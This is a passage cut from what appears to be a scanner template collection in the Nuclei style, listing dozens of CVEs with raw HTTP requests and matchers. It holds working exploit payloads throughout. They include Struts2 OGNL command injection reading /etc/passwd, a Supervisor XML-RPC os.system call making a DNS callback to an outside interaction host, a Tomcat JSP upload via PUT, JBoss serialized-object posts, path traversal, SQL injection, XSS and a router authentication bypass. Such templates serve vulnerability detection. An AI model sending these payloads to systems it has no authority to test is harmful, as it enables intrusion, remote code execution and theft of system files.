/{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ClassCastException"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31879","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nGET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","duration_2 - duration_1 >= 7","contains(content_type_2, \"text/html\")","contains(body_2, \"Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(5)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-47615","info":{"name":"LearnPress Plugin < 4.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["\"status\":","\"pagination\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; 